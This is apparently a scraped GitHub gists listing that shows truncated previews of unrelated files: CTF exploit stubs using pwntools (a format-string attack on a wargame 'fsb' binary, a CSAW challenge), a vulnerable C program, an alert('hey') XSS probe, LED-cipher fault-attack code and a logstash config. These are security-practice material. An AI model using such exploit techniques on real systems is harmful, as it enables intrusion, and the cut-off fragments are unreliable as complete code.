This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| # nc pwn.chal.csaw.io 1005 | |
| win_offset = 0x00001189 | |
| lose_offset = 0x000011f8 | |
| context.terminal = [ '/usr/bin/gnome-terminal', '-e' ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| undefined8 main(int argc,char **argv) | |
| { | |
| __uid_t __uid; | |
| __uid_t _Var1; | |
| __gid_t __gid; | |
| int iVar2; | |
| char *sh_color; | |
| ulong uVar3; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('hey'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| keyspace = 0 | |
| for a in fault_values['a']: | |
| for b in fault_values['b']: | |
| for c in fault_values['c']: | |
| for d in fault_values['d']: | |
| k0_4_8_12 = sxis[('a', 0)][a].intersection(sxis[('d', 1)][d]).intersection(sxis[('c', 2)][c]).intersection(sxis[('b', 3)][b]) | |
| k1_5_9_13 = sxis[('a', 3)][a].intersection(sxis[('d', 0)][d]).intersection(sxis[('c', 1)][c]).intersection(sxis[('b', 2)][b]) | |
| k2_6_10_14 = sxis[('a', 2)][a].intersection(sxis[('d', 3)][d]).intersection(sxis[('c', 0)][c]).intersection(sxis[('b', 1)][b]) | |
| k3_7_11_15 = sxis[('a', 1)][a].intersection(sxis[('d', 2)][d]).intersection(sxis[('c', 3)][c]).intersection(sxis[('b', 0)][b]) |
lionaneesh
/ led_key_tuple_filtering.py
Last active
June 17, 2019 12:41
Key Tuple Filtering LED Cipher
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setGF2(4, 0b10011) | |
| # define fault equations | |
| faults_a = [[0, 4, 8, 12], [3, 7, 11, 15], [2, 6, 10, 14], [1, 5, 9, 13]] | |
| faults_d = [[1, 5, 9, 13], [0, 4, 8, 12], [3, 7, 11, 15], [2, 6, 10, 14]] | |
| faults_c = [[2, 6, 10, 14], [1, 5, 9, 13], [0, 4, 8, 12], [3, 7, 11, 15]] | |
| faults_b = [[3, 7, 11, 15], [2, 6, 10, 14], [1, 5, 9, 13], [0, 4, 8, 12]] | |
| coefs = {'a': [4, 8, 0xB, 2], | |
| 'b': [1, 6, 0xE, 2], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AddKey(state, keyNibbles, 0); | |
| for(i = 0; i < RN/4; i++){ | |
| int a; | |
| for (j = 0; j < 4; j++) { | |
| for (a = 0; a < 4; a++) { |
lionaneesh
/ problem.c
Created
May 15, 2019 09:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| int main(int argc, char **argv){ | |
| FILE *fp = fopen("level10.pass", "r"); | |
| struct {char pass[20], msg_err[20];} pwfile = {{0}}; | |
| char ptr[0]; |
lionaneesh
/ exploit_fsb.py
Last active
March 1, 2019 11:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| p = process("/home/fsb/fsb", stdout=open('/dev/null', 'w+')) | |
| key_addr = 0x0804a060 | |
| key_low = key_addr & 0xffff | |
| key_high = (key_addr >> 16) & 0xffff | |
| # Param 14 => 20 | |
| # Param 15 => 21 | |
| p.readuntil("strings(1)") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <alloca.h> | |
| #include <fcntl.h> | |
| unsigned long long key; | |
| char buf[100]; | |
| char buf2[100]; | |
| int fsb(char** argv, char** envp){ | |
| char* args[]={"/bin/sh", 0}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input { | |
| tcp { | |
| port => 15530 | |
| type => syslog | |
| } | |
| udp { | |
| port => 15530 | |
| type => syslog | |
| } | |
| } |